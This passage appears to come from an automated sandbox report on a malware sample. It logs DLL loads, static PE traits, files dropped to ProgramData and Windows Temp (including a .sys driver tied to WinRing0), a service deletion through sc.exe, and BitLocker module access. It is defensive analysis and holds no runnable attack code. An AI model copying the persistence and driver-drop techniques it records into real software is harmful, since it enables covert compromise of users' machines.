              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: gq83mrprwy.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: gq83mrprwy.exeStatic file information: File size 2653184 > 1048576
              Source: gq83mrprwy.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x27d600
              Source: gq83mrprwy.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmp
              Source: gq83mrprwy.exeStatic PE information: section name: .00cfg
              Source: vefyedjsvjut.exe.0.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\gq83mrprwy.exeCode function: 0_2_00007FF7970C1394 push qword ptr [00007FF7970CB004h]; ret 0_2_00007FF7970C1403
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeCode function: 28_2_00007FF74F581394 push qword ptr [00007FF74F58B004h]; ret 28_2_00007FF74F581403
              Source: C:\Windows\System32\conhost.exeCode function: 40_2_0000000140001394 push qword ptr [0000000140009004h]; ret 40_2_0000000140001403

              Persistence and Installation Behavior

              barindex
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeFile created: C:\Windows\TEMP\zadejssjsckf.sysJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeFile created: C:\Windows\Temp\zadejssjsckf.sysJump to dropped file
              Source: C:\Users\user\Desktop\gq83mrprwy.exeFile created: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeJump to dropped file
              Source: C:\Users\user\Desktop\gq83mrprwy.exeFile created: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeJump to dropped file
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeFile created: C:\Windows\Temp\zadejssjsckf.sysJump to dropped file
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CENLNOGJ"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
